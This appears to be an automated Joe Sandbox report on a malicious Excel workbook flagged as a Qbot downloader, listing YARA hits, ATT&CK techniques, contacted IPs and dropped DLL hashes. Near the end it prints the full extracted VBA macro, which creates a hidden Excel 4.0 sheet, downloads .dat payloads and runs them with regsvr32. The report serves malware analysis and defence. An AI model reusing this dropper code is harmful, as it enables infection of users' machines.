Source: Yara match	File source: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Qbot

Show sources

Source: Yara match	File source: 7.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.3b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.explorer.exe.c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.3b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.explorer.exe.c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.635284743.0000000000300000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.619249193.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter11	Windows Service3	Windows Service3	Masquerading121	Credential API Hooking1	System Time Discovery1	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job1	Scheduled Task/Job1	Process Injection413	Disable or Modify Tools1	LSASS Memory	Security Software Discovery1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scripting2	Logon Script (Windows)	Scheduled Task/Job1	Modify Registry1	Security Account Manager	Virtualization/Sandbox Evasion1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Service Execution2	Logon Script (Mac)	Logon Script (Mac)	Virtualization/Sandbox Evasion1	NTDS	Process Discovery3	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol21	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Native API3	Network Logon Script	Network Logon Script	Process Injection413	LSA Secrets	File and Directory Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Exploitation for Client Execution32	Rc.common	Rc.common	Scripting2	Cached Domain Credentials	System Information Discovery15	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
xls.xls	31%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.7495993056[1].dat	100%	Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.%s.comPA	0%	URL Reputation	safe
http://190.14.37.178/44467.7495993056.dat	0%	Avira URL Cloud	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://190.14.37.178/44467.7495993056.dat	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.%s.comPA	regsvr32.exe, 00000006.00000002.620761307.0000000002220000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.888614780.0000000002030000.00000002.00020000.sdmp	false	URL Reputation: safe	low
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	explorer.exe, 00000007.00000002.888614780.0000000002030000.00000002.00020000.sdmp	false		high
http://servername/isapibackend.dll	regsvr32.exe, 00000005.00000002.623444753.0000000001DE0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.619701962.0000000001D20000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.624053267.0000000001C80000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.624752810.0000000001D10000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.638759143.00000000009E0000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.183.96.67	unknown	Netherlands	60117	HSAE	false
190.14.37.178	unknown	Panama	52469	OffshoreRacksSAPA	false
185.250.148.213	unknown	Russian Federation	48430	FIRSTDC-ASRU	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	492442
Start date:	28.09.2021
Start time:	17:59:03
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	xls.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLS@25/6@0/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 20.6% (good quality ratio 19%) Quality average: 75% Quality standard deviation: 29.1%
HCA Information:	Successful, ratio: 86% Number of executed functions: 141 Number of non-executed functions: 88
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Changed system and user locale, location and keyboard layout to English - United States Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing disassembly code information. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
18:00:55	API Interceptor	30x Sleep call for process: regsvr32.exe modified
18:00:57	API Interceptor	870x Sleep call for process: explorer.exe modified
18:01:01	API Interceptor	2x Sleep call for process: schtasks.exe modified
18:01:02	Task Scheduler	Run new task: mywmprn path: regsvr32.exe s>-s "C:\Users\user\Drezd.red"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.183.96.67	#Qbot downloader.xls	Get hash	malicious	Browse	185.183.96.67/44466.8890891204.dat
	Compensation-2308017-09272021.xls	Get hash	malicious	Browse	185.183.96.67/44466.7516903935.dat
	Compensation-1730406737-09272021.xls	Get hash	malicious	Browse	185.183.96.67/44466.7022844907.dat

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HSAE	Compensation-1214892625-09272021.xls	Get hash	malicious	Browse	185.183.96.67
	Compensation-2100058996-09272021.xls	Get hash	malicious	Browse	185.183.96.67
	Compensation-1657705079-09272021.xls	Get hash	malicious	Browse	185.183.96.67
	Compensation-1214892625-09272021.xls	Get hash	malicious	Browse	185.183.96.67
	#Qbot downloader.xls	Get hash	malicious	Browse	185.183.96.67
	Compensation-2308017-09272021.xls	Get hash	malicious	Browse	185.183.96.67
	Compensation-1730406737-09272021.xls	Get hash	malicious	Browse	185.183.96.67
	KHI13mrm4c.exe	Get hash	malicious	Browse	185.183.98.2
	Copy of Payment-228607772-09222021.xls	Get hash	malicious	Browse	185.82.202.248
	NJS4hNBeUR.exe	Get hash	malicious	Browse	185.198.57.68
	rQoEGMGufv.exe	Get hash	malicious	Browse	185.45.192.203
	5ya8R7LxXl.exe	Get hash	malicious	Browse	185.45.192.203
	Uz2eSldsZe.exe	Get hash	malicious	Browse	185.45.192.203
	SWIFT_COPY.htm	Get hash	malicious	Browse	194.36.191.196
	3hTS09wZ7G.exe	Get hash	malicious	Browse	185.183.96.3
	040ba58b824e36fc9117c1e3c8b651d9e4dc3fe12b535.exe	Get hash	malicious	Browse	185.183.96.3
	OC2Z0JbqfA.exe	Get hash	malicious	Browse	185.183.96.3
	89o9iHBGiB.exe	Get hash	malicious	Browse	185.183.96.3
	DWVByMCYL8.exe	Get hash	malicious	Browse	185.183.96.3
	DUpgpAnHkq.exe	Get hash	malicious	Browse	185.183.96.3

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\Drezd.red	Compensation-1214892625-09272021.xls	Get hash	malicious	Browse
	Compensation-2100058996-09272021.xls	Get hash	malicious	Browse
	Compensation-1657705079-09272021.xls	Get hash	malicious	Browse
	Compensation-1214892625-09272021.xls	Get hash	malicious	Browse
	#Qbot downloader.xls	Get hash	malicious	Browse
	Compensation-2308017-09272021.xls	Get hash	malicious	Browse
	Compensation-1730406737-09272021.xls	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.7495993056[1].dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	387072
Entropy (8bit):	4.528520016236287
Encrypted:	false
SSDEEP:	3072:Do6vBnby4Yx0XjFFzPQ0MslzERfQB24hLxBVi/b/9+PdpiWC35ol/uwfTuT2b2Mx:vs6Xpq0H3Jhds/9+qC/zfTPLL
MD5:	6C89E2D95882B9668285D9C8DF9EED6D
SHA1:	EC523CA5548802700D486A209C14173A6D6CDA54
SHA-256:	B8D85FEF926FC94B34936042F552EAF2B148255BB2A3FF40894539C956531B31
SHA-512:	1F0D781EFB3C1E1E317B4066D3E1081BA9333F60B19B91C351C44AA3F774B47BBC27EAE47BA75486017358D7D0805FE09C8303D7FB506A0F3ECC66808E7203A1
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......\|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	162688
Entropy (8bit):	4.25437517071697
Encrypted:	false
SSDEEP:	1536:C6ddL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CSJNSc83tKBAvQVCgOtmXmLpLm4l
MD5:	40C07C4525D96EAF485988B9D7CB3F9D
SHA1:	4093F92CC11B8BC488A39FFB06DEDED5CA6E9A8E
SHA-256:	1A992CFD9414F84D1FC0A51CABC0BB705CB9EF4345C5E8A1AB441803A9EE228A
SHA-512:	F5C6931322070E731C49A811564CF99C353916ACBEF78B49160DC8273F972FAA4F3D78A0B5692060629FA76C417A50A09BF71AC16712164ADBE96453C45D3707
Malicious:	false
Preview:	MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........\|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0......*..\+...+..$,...,...,..P-...-......\|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................

C:\Users\user\AppData\Local\Temp\VBE\RefEdit.exd Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	15676
Entropy (8bit):	4.532606740739516
Encrypted:	false
SSDEEP:	192:Wxl811DxzCOtHIT6P20eChgZjTdZ3HJV8L1I17EMBkDXrq9LwGGLVbkLde:W3wxesT20lheZ3waE5D7qxIxkxe
MD5:	F79E24E707B060705D150AAE1D1AD517
SHA1:	A5ACE1DDC4B04D65BE1B3A9547C92813B0B809B7
SHA-256:	014435EA0D1AF50297D57F20D2AE473FAA96BCBCDA38FB0F9724E9266F30B6A6
SHA-512:	E35DD740D2BE0FAF6EE9DA0CA4CB51ABF191367BDF2F598E129FCEA840ADE31776A28EAB66EC10892846E12AD9ADC0FD8E6CCC65D4B2748C8EF7ACFB7568CE82
Malicious:	false
Preview:	MSFT................A...............................1............... ...................d...........,...................\...........H...4...........0... ...............................................................x...............................x.......................................................................................$"...............................................P..................................................$"..........................................0....P..,.........................0.....................%"..........................................H..."...................................................H.......(...................@...................P...............0.......`...............................p...X... ..................nY*.J.......D.........E.............F...........B........`..d......."E.............F........0..............F..........E........`.M...........CPf.........0..=.......01..)....w....<WI.......\.1Y........k...U........".......\|...K..a...

C:\Users\user\Drezd.red Download File
Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	387072
Entropy (8bit):	1.6961804656486577
Encrypted:	false
SSDEEP:	1536:92VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:XC6MtAAFNJ5XC5SYCi02r+J
MD5:	B19B0AF9A01DD936D091C291B19696C8
SHA1:	862ED0B9586729F2633670CCD7D075D7693908E1
SHA-256:	17D261EACA2629EF9907D0C00FB2271201E466796F06DCB7232900D711C29330
SHA-512:	9F0CE65AFA00919797A3A75308CF49366D5DCA0C17EA3CFAB70A9E9244E0D5AB6DEC21A3A46C2C609159E0CBF91AF4F10E6A36F3FB7310A5C2B062249AB43DB4
Malicious:	true
Joe Sandbox View:	Filename: Compensation-1214892625-09272021.xls, Detection: malicious, Browse Filename: Compensation-2100058996-09272021.xls, Detection: malicious, Browse Filename: Compensation-1657705079-09272021.xls, Detection: malicious, Browse Filename: Compensation-1214892625-09272021.xls, Detection: malicious, Browse Filename: #Qbot downloader.xls, Detection: malicious, Browse Filename: Compensation-2308017-09272021.xls, Detection: malicious, Browse Filename: Compensation-1730406737-09272021.xls, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......\|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Mon Sep 27 10:38:52 2021, Security: 0
Entropy (8bit):	7.131906653704249
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	xls.xls
File size:	129024
MD5:	170b6a83db1f64901d186eda31962306
SHA1:	9dedf1b8c2af2ea202b62b8c8a07a314f56ca6d5
SHA256:	7afc98f96efa95af64e356e7857d7db38e9d2eb9a0b8cab36acc7f8b96b7f978
SHA512:	d11fddb5698ddba3340c42ddf2012c847eea3d03003bb6b84cf9aff30ab21568d416683d431547d1d07c03d4511fb9677f7b220eb38d4b2080e4e55ac77e13be
SSDEEP:	3072:Cik3hOdsylKlgxopeiBNhZFGzE+cL2kdAnc6YehWfG+tUHKGDbpmsiinBti2JtqV:vk3hOdsylKlgxopeiBNhZF+E+W2kdAne
File Content Preview:	........................>.......................................................b..............................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "xls.xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1251
Author:	Test
Last Saved By:	Test
Create Time:	2015-06-05 18:17:20
Last Saved Time:	2021-09-27 09:38:52
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Document Code Page:	1251
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams with VBA

VBA File Name: UserForm2, Stream Size: -1

General
Stream Path:	_VBA_PROJECT_CUR/UserForm2
VBA File Name:	UserForm2
Stream Size:	-1
Data ASCII:
Data Raw:

VBA Code

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{C7392748-7F28-4EE6-BCFC-6C9C72F3AD88}{96B851A6-6A1B-4177-A71C-36C172A843DA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

VBA File Name: Module5, Stream Size: 4241

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Module5
VBA File Name:	Module5
Stream Size:	4241
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 03 f0 00 00 00 a2 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff d0 03 00 00 9c 0d 00 00 00 00 00 00 01 00 00 00 fb 18 e3 25 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Module5"

Sub auto_open()
On Error Resume Next
Trewasd = "REGISTER"
Drezden = "="
Naret = "EXEC"
Application.ScreenUpdating = False
Gert
Sheets("Sheet777").Visible = False
Sheets("Sheet777").Range("A1:M100").Font.Color = vbWhite

Sheets("Sheet777").Range("H24") = UserForm2.Label1.Caption
Sheets("Sheet777").Range("H25") = UserForm2.Label3.Caption
Sheets("Sheet777").Range("H26") = UserForm2.Label4.Caption

Sheets("Sheet777").Range("K17") = "=NOW()"
Sheets("Sheet777").Range("K18") = ".dat"
Sheets("Sheet777").Range("K18") = ".dat"


Sheets("Sheet777").Range("H35") = "=HALT()"
Sheets("Sheet777").Range("I9") = UserForm2.Label2.Caption
Sheets("Sheet777").Range("I10") = UserForm2.Caption
Sheets("Sheet777").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B"
Sheets("Sheet777").Range("I12") = "Byukilos"
Sheets("Sheet777").Range("G10") = "..\Drezd.red"
Sheets("Sheet777").Range("G11") = "..\Drezd1.red"
Sheets("Sheet777").Range("G12") = "..\Drezd2.red"
Sheets("Sheet777").Range("I17") = "regsvr32 -silent ..\Drezd.red"
Sheets("Sheet777").Range("I18") = "regsvr32 -silent ..\Drezd1.red"
Sheets("Sheet777").Range("I19") = "regsvr32 -silent ..\Drezd2.red"
Sheets("Sheet777").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
Sheets("Sheet777").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
Sheets("Sheet777").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
Sheets("Sheet777").Range("H9") = Drezden & Trewasd & "(I9,I10&J10,I11,I12,,1,9)"
Sheets("Sheet777").Range("H17") = Drezden & Naret & "(I17)"
Sheets("Sheet777").Range("H18") = Drezden & Naret & "(I18)"
Sheets("Sheet777").Range("H19") = Drezden & Naret & "(I19)"


Application.Run Sheets("Sheet777").Range("H1")

End Sub

Sub auto_close()
On Error Resume Next
Application.ScreenUpdating = True
   Application.DisplayAlerts = False
   Sheets("Sheet777").Delete
   Application.DisplayAlerts = True
End Sub

Function Gert()
Set Fera = Excel4IntlMacroSheets
Fera.Add.Name = "Sheet777"
End Function

VBA File Name: Sheet1, Stream Size: 991

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1
Stream Size:	991
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . 9 . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 fb 18 b4 39 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: ThisWorkbook, Stream Size: 2501

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook
Stream Size:	2501
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r S . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 82 04 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 89 04 00 00 a9 07 00 00 00 00 00 00 01 00 00 00 fb 18 72 53 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit

Private m_openAlreadyRan As Boolean
Private m_isOpenDelayed As Boolean

Friend Sub FireOpenEventIfNeeded(Optional dummyVarToMakeProcHidden As Boolean)
End Sub

Private Sub asWorkbook_Activateas()
    On Error Resume Next

    If m_isOpenDelayed Then
        m_isOpenDelayed = False
        InitWorkbook
    End If
End Sub

Private Sub saWorkbook_Opensa()
    On Error Resume Next


End Sub

Private Sub ssaaInitWorkbookssaa()
    On Error Resume Next

    If VBA.Val(Application.Version) < 12 Then
        Me.Close False
        Exit Sub
    End If
    '
        'Other code
        '
        '
        '
End Sub

VBA File Name: UserForm2, Stream Size: 1182

General
Stream Path:	_VBA_PROJECT_CUR/VBA/UserForm2
VBA File Name:	UserForm2
Stream Size:	1182
Data ASCII:	. . . . . . . . . V . . . . . . . L . . . . . . . ] . . . . . . . . . . . . . . . . . . J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 56 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 5d 03 00 00 b1 03 00 00 00 00 00 00 01 00 00 00 fb 18 b2 4a 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{C7392748-7F28-4EE6-BCFC-6C9C72F3AD88}{96B851A6-6A1B-4177-A71C-36C172A843DA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 108

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	108
Entropy:	4.18849998853
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	244
Entropy:	2.65175227267
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00

